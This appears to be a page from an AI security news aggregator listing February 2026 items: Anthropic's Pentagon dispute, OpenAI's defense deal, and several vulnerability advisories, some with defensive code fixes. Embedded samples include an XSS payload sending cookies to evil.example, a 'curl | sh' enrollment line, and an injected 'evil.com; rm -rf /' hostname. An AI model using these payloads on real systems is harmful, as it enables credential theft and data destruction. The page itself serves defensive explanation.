aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

3137 items

The trap Anthropic built for itself

info · news
policy · safety
Feb 28, 2026

Anthropic, an AI company founded in 2021, lost a $200 million Pentagon contract and faced a federal ban after refusing to allow its technology to be used for mass surveillance or autonomous weapons systems. According to physicist Max Tegmark, Anthropic and other major AI companies like OpenAI and Google DeepMind have contributed to this crisis by resisting binding regulation and repeatedly breaking their own safety promises, most recently when Anthropic dropped its core commitment not to release powerful AI systems until confident they would not cause harm.

TechCrunch

Anthropic’s Claude rises to No. 2 in the App Store following Pentagon dispute

info · news
policy
Feb 28, 2026

Anthropic's Claude AI chatbot has risen to the second most popular free app in Apple's US App Store, jumping from outside the top 100 in late January to No. 2 by early February. This surge in downloads followed a public dispute in which Anthropic negotiated with the Pentagon over safeguards to prevent its AI from being used for mass domestic surveillance or fully autonomous weapons, which led President Trump to direct federal agencies to stop using Anthropic products.

TechCrunch

The billion-dollar infrastructure deals powering the AI boom

info · news
industry
Feb 28, 2026

AI companies are spending billions of dollars on computing infrastructure to power AI models, with estimates of $3–4 trillion by the end of the decade. Major tech companies like Microsoft, Google, Oracle, and Amazon are competing to provide cloud services and specialized hardware to AI labs, leading to massive deals such as Oracle's $300 billion agreement with OpenAI and Microsoft's $14 billion investment in the company. This infrastructure race is straining power grids and stretching construction capacity to its limits as the industry races to meet the enormous computing demands of AI training.

TechCrunch

Anthropic's Claude hits No. 2 on Apple's top free apps list after Pentagon rejection

info · news
policy
Feb 28, 2026

Anthropic's Claude AI app jumped to the No. 2 position on Apple's free apps chart after the Trump administration and Department of Defense moved to block government agencies from using the company's technology, citing concerns about Anthropic's refusal to support mass domestic surveillance or fully autonomous weapons. The surge in popularity suggests consumers are responding positively to Anthropic's ethical stance, even as the Pentagon designated the company a supply-chain risk (a classification that prevents defense contractors from using its tools).

CNBC Technology

ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket

high · news
security
Feb 28, 2026

OpenClaw fixed a high-severity vulnerability called ClawJacked that let malicious websites hijack local AI agents by exploiting a missing rate-limiting mechanism on the gateway's WebSocket server (a protocol for two-way communication between browsers and servers). An attacker could trick a developer into visiting a malicious site, then use JavaScript to brute-force the gateway password, auto-register as a trusted device, and gain complete control over the AI agent to steal data and execute commands.

Fix: OpenClaw released version 2026.2.25 on February 26, 2026, which fixed the vulnerability. Users are advised to "apply the latest updates as soon as possible, periodically audit access granted to AI agents, and enforce appropriate governance controls for non-human (aka agentic) identities."

The Hacker News
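The underlying weakness is an authentication endpoint that accepts unlimited password guesses. A minimal sketch of the mitigation class involved, per-client attempt limiting with a lockout, using hypothetical names (this is not OpenClaw's actual gateway code):

```python
import time
from collections import defaultdict

class AttemptLimiter:
    """Track failed auth attempts per client and lock out brute-forcers.

    Hypothetical illustration of rate limiting an auth handshake; not
    OpenClaw's real implementation.
    """

    def __init__(self, max_attempts=5, window_seconds=60, lockout_seconds=300):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.lockout = lockout_seconds
        self._failures = defaultdict(list)   # client_id -> failure timestamps
        self._locked_until = {}              # client_id -> unlock time

    def allow(self, client_id, now=None):
        """Return True if this client may attempt authentication right now."""
        now = time.monotonic() if now is None else now
        if self._locked_until.get(client_id, 0) > now:
            return False  # still locked out
        # Drop failures that fell outside the sliding window.
        recent = [t for t in self._failures[client_id] if now - t < self.window]
        self._failures[client_id] = recent
        return len(recent) < self.max_attempts

    def record_failure(self, client_id, now=None):
        """Record a failed attempt; trigger a lockout at the threshold."""
        now = time.monotonic() if now is None else now
        self._failures[client_id].append(now)
        if len(self._failures[client_id]) >= self.max_attempts:
            self._locked_until[client_id] = now + self.lockout
```

A WebSocket server would call `allow()` before checking a submitted password and `record_failure()` on a mismatch, which turns an unbounded JavaScript brute-force into a handful of guesses per window.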

OpenAI to work with Pentagon after Anthropic dropped by Trump over company’s ethics concerns

info · news
policy
Feb 28, 2026

OpenAI announced a deal to provide AI technology to classified US military networks, shortly after the Trump administration ended its relationship with Anthropic (a competing AI company that makes Claude) over ethics disagreements. Anthropic had wanted guarantees that its AI would not be used for mass surveillance or autonomous weapons systems (systems that can select and attack targets without human decision-making).

The Guardian Technology

OpenAI’s Sam Altman announces Pentagon deal with ‘technical safeguards’

info · news
policy · security
Feb 28, 2026

OpenAI announced a deal allowing the Department of Defense to use its AI models on classified networks, following a dispute where rival Anthropic refused to agree to unrestricted military use without safeguards against mass domestic surveillance and fully autonomous weapons. Sam Altman stated that OpenAI's agreement includes technical protections addressing these same concerns, with OpenAI building a 'safety stack' (a set of security and control measures) and deploying engineers to ensure the models behave correctly.

Fix: According to Altman, OpenAI will 'build technical safeguards to ensure our models behave as they should' and will 'deploy engineers with the Pentagon to help with our models and to ensure their safety.' Additionally, the government will allow OpenAI to build its own 'safety stack to prevent misuse' and 'if the model refuses to do a task, then the government would not force OpenAI to make it do that task.'

TechCrunch

AI just leveled up and there are no guardrails anymore

info · news
policy · safety
Feb 28, 2026

AI systems have rapidly become more powerful in early 2026, advancing from chatbots to autonomous agents (AI systems that can reason, plan, and complete tasks independently) capable of doing real work. However, safety guardrails (protections designed to prevent harm) are being removed as companies compete: Anthropic abandoned its core safety commitments, researchers at major AI companies are resigning over safety concerns, and there is significant political and financial pressure against AI regulation.

CNBC Technology

Area Man Accidentally Hacks 6,700 Camera-Enabled Robot Vacuums

info · news
security
Feb 28, 2026

A person discovered a serious security vulnerability in DJI Romo robot vacuums that allowed unauthorized access to 6,700 devices across 24 countries using only the vacuum's 14-digit serial number, granting attackers full access to floor plans, video, and audio feeds from inside homes. The vulnerability exposed how internet-connected home devices with cameras and microphones can be hijacked remotely, raising broader concerns about the security of similar smart home gadgets. DJI has since patched the vulnerability in response to the discovery being publicly disclosed.

Fix: DJI has fixed the vulnerability in response to the findings being reported.

Wired (Security)

Her husband wanted to use ChatGPT to create sustainable housing. Then it took over his life.

info · news
safety
Feb 28, 2026

This article describes a tragedy where a man spent 12 hours daily using ChatGPT (a conversational AI) and subsequently died by suicide, despite having no prior history of depression or suicidal thoughts. His wife questions whether the intensive chatbot use contributed to his death, as he was previously described as an optimistic person.

The Guardian Technology

Thousands of Public Google Cloud API Keys Exposed with Gemini Access After API Enablement

high · news
security · privacy
Feb 28, 2026

Google Cloud API keys (unique identifiers used for billing and accessing Google services) that were embedded in websites for basic functions like maps were automatically granted access to Gemini (Google's AI model) when users enabled the Gemini API on their projects, without any warning. This allowed attackers who found these exposed keys on the public internet to access private files, cached data, and run expensive AI requests that get billed to the victims, with nearly 3,000 such keys discovered by security researchers.

Fix: Google has implemented proactive measures to detect and block leaked API keys that attempt to access the Gemini API. Additionally, users are advised to (1) check their Google Cloud projects to verify whether AI-related APIs are enabled, and (2) if enabled keys are publicly accessible in client-side JavaScript or public repositories, rotate them, starting with the oldest first, as those are most likely to have been deployed publicly under the old guidance that API keys were safe to share.

The Hacker News
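Google API keys follow a recognizable shape (an `AIza` prefix followed by 35 URL-safe characters), which is how researchers locate them in public pages and repositories. A rough scanner sketch; the regex reflects the commonly documented key format, and any hit should be treated as a candidate to verify, not a confirmed live key:

```python
import re

# Commonly documented shape of a Google API key: "AIza" + 35 URL-safe chars.
GOOGLE_API_KEY_RE = re.compile(r"AIza[0-9A-Za-z_\-]{35}")

def find_candidate_keys(text):
    """Return unique Google-API-key-shaped strings found in text."""
    return sorted(set(GOOGLE_API_KEY_RE.findall(text)))

# Example: a key accidentally shipped in client-side JavaScript.
sample = '<script>const cfg = {key: "AIza' + 'A' * 35 + '"};</script>'
print(find_candidate_keys(sample))
```

Running a scan like this over your own deployed JavaScript and public repositories is a quick way to build the rotation list the advisory recommends.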

Pentagon Designates Anthropic Supply Chain Risk Over AI Military Dispute

info · news
policy · safety
Feb 27, 2026

The U.S. Pentagon designated Anthropic (an AI company) as a 'supply chain risk' after negotiations broke down over the company's refusal to allow its AI model Claude to be used for mass domestic surveillance or fully autonomous weapons systems. Anthropic argued these uses are unsafe and incompatible with democratic values, while the Pentagon insisted it needed unrestricted access to the technology for military operations.

The Hacker News

OpenAI strikes deal with Pentagon, hours after rival Anthropic was blacklisted by Trump

info · news
policy · industry
Feb 27, 2026

OpenAI reached an agreement with the U.S. Department of Defense to deploy its AI models on classified military networks, while the Trump administration simultaneously blacklisted rival Anthropic as a 'Supply-Chain Risk to National Security' and banned federal agencies from using Anthropic's technology. The key difference: OpenAI accepted the DoD's terms, including safety restrictions on domestic mass surveillance and autonomous weapons, whereas Anthropic refused unrestricted military use cases and sought guarantees that its models would not be used for fully autonomous weapons or mass surveillance.

Fix: According to Altman, OpenAI committed to building 'technical safeguards to ensure its models behave as they should' and will deploy personnel to 'help with our models and to ensure their safety.' Additionally, OpenAI asked the DoD to offer these same safety terms to all AI companies.

CNBC Technology

GHSA-4rv8-5cmm-2r22: osctrl has Stored Cross-Site Scripting (XSS) in On-Demand Query List

medium · vulnerability
security
Feb 27, 2026
CVE-2026-28280

osctrl-admin, a system administration tool, has a stored XSS vulnerability (cross-site scripting, where malicious code injected into a website executes when other users view it) in its on-demand query list. Users with basic query permissions can inject harmful JavaScript that runs in the browsers of anyone viewing the query list, including administrators, potentially allowing attackers to steal credentials or take control of the entire platform.

Fix: Fixed in osctrl v0.5.0. Users should upgrade immediately.

Hugging Face Security Advisories
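The standard remedy for stored XSS of this kind is contextual output encoding of user-controlled values. A generic illustration in Python (osctrl itself is written in Go, so this shows the technique, not the project's actual patch):

```python
import html

def render_query_row(query_name):
    """Render a table row with the user-controlled name HTML-escaped.

    Generic illustration of output encoding; any template engine with
    auto-escaping achieves the same effect.
    """
    return f"<tr><td>{html.escape(query_name)}</td></tr>"

payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
print(render_query_row(payload))
# The payload is rendered as inert text, not executable markup.
```

The key property is that escaping happens at render time, in the HTML context, so a stored query name can never break out of its table cell.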

GHSA-rchw-322g-f7rm: osctrl is Vulnerable to OS Command Injection via Environment Configuration

high · vulnerability
security
Feb 27, 2026
CVE-2026-28279

osctrl-admin has a vulnerability where an authenticated administrator can inject arbitrary shell commands (OS command injection, where an attacker runs unauthorized commands on a system) through the hostname parameter when setting up environments. These commands get embedded into enrollment scripts and execute on every computer that enrolls using that compromised environment, running with the highest privilege level before osquery (endpoint monitoring software) is even installed.

Fix: Fixed in osctrl v0.5.0. Users should upgrade immediately. As workarounds, restrict osctrl administrator access to trusted personnel, review existing environment configurations for suspicious hostnames, and monitor enrollment scripts for unexpected commands.

GitHub Advisory Database
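The defensive pattern for values embedded in generated shell scripts is strict validation plus shell quoting. A sketch with hypothetical helper names (not osctrl's code):

```python
import re
import shlex

# RFC 952/1123-style hostnames: dot-separated labels of letters,
# digits, and interior hyphens; 253 characters overall at most.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?"
    r"(\.[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$"
)

def build_enroll_snippet(hostname):
    """Embed a hostname into a shell snippet only after strict validation.

    Hypothetical helper: the allow-list regex already excludes shell
    metacharacters, and shlex.quote is belt-and-braces on top.
    """
    if not HOSTNAME_RE.match(hostname):
        raise ValueError(f"invalid hostname: {hostname!r}")
    return f"curl -sk https://{shlex.quote(hostname)}/enroll | sh"

print(build_enroll_snippet("osctrl.example.com"))
```

A payload such as `evil.com; rm -rf /` fails the allow-list check outright instead of being written into every new endpoint's enrollment script.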

Defense secretary Pete Hegseth designates Anthropic a supply chain risk

info · news
policy · industry
Feb 27, 2026

The US Secretary of Defense designated Anthropic, an AI company that makes Claude (an LLM, or large language model that generates text), as a supply-chain risk and banned its products from federal government use. This decision could affect major tech companies like Palantir and AWS that use Claude in their work with the Pentagon, though it's unclear how broadly the ban will apply to companies contracting with Claude for non-military purposes.

The Verge (AI)

OpenAI fires employee for using confidential info on prediction markets

info · incident
security · policy
Feb 27, 2026

OpenAI fired an employee who used confidential company information to make trades on prediction markets (platforms like Polymarket where people bet money on real-world events). The employee's actions violated OpenAI's internal policy against using insider information for personal financial gain.

TechCrunch

How Amazon's massive stake in OpenAI could boost its AI and cloud businesses

info · news
industry
Feb 27, 2026

Amazon announced a strategic partnership with OpenAI involving up to $50 billion in investment, with OpenAI committing to spend $100 billion on Amazon Web Services (AWS, Amazon's cloud computing platform) over eight years. The deal includes OpenAI deploying Amazon's AI chips and the two companies jointly developing customized AI models, marking a significant expansion of Amazon's AI infrastructure investments alongside its existing partnerships with OpenAI's competitor Anthropic.

CNBC Technology

CVE-2026-28416: Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, a Server-Side Request Forgery…

high · vulnerability
security
Feb 27, 2026
CVE-2026-28416

Gradio, a Python package for building AI demos, had a vulnerability (SSRF, or server-side request forgery, where an attacker tricks a server into making requests it shouldn't) before version 6.6.0 that let attackers access internal services and private networks by hosting a malicious Gradio Space that victims load with the `gr.load()` function.

Fix: Update Gradio to version 6.6.0 or later, which fixes the issue.

NVD/CVE Database
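A common SSRF hardening step for loaders like this is to resolve the target host and refuse private, loopback, or link-local addresses before fetching. A generic sketch of that check (an illustration of the technique, not Gradio's actual patch):

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def is_safe_public_url(url):
    """Reject URLs whose host resolves to a private, loopback,
    link-local, or reserved address (a generic SSRF guard)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parts.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```

Checking every resolved address (rather than the hostname string) matters because DNS can point an innocent-looking name at `127.0.0.1` or a cloud metadata address.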

CVE-2026-28415: Gradio is an open-source Python package designed for quick prototyping. Prior to version 6.6.0, the _redirect_to_target()…

medium · vulnerability
security
Feb 27, 2026
CVE-2026-28415

Gradio, a Python package for building AI interfaces quickly, has a vulnerability in versions before 6.6.0 where the _redirect_to_target() function doesn't validate the _target_url parameter, allowing attackers to redirect users to malicious external websites through the /logout and /login/callback endpoints on apps using OAuth (a login system). This vulnerability only affects Gradio apps running on Hugging Face Spaces with gr.LoginButton enabled.

Fix: Update to Gradio version 6.6.0 or later. Starting in version 6.6.0, the _target_url parameter is sanitized to only use the path, query, and fragment, stripping any scheme or host.

NVD/CVE Database
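The fix described, keeping only the path, query, and fragment of the target URL, can be sketched with the standard library (this mirrors the described behavior, not Gradio's literal code):

```python
from urllib.parse import urlsplit, urlunsplit

def sanitize_redirect_target(target_url):
    """Strip scheme and host so a redirect can only stay on the current site."""
    parts = urlsplit(target_url)
    # Normalizing to a single leading slash also defuses protocol-relative
    # targets like "//evil.example/x", which browsers treat as absolute.
    path = "/" + parts.path.lstrip("/")
    return urlunsplit(("", "", path, parts.query, parts.fragment))

print(sanitize_redirect_target("https://evil.example/phish?next=1#top"))
# -> "/phish?next=1#top"
```

Because the scheme and host are dropped, an attacker-supplied absolute URL collapses into a same-site relative path, which eliminates the open redirect.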
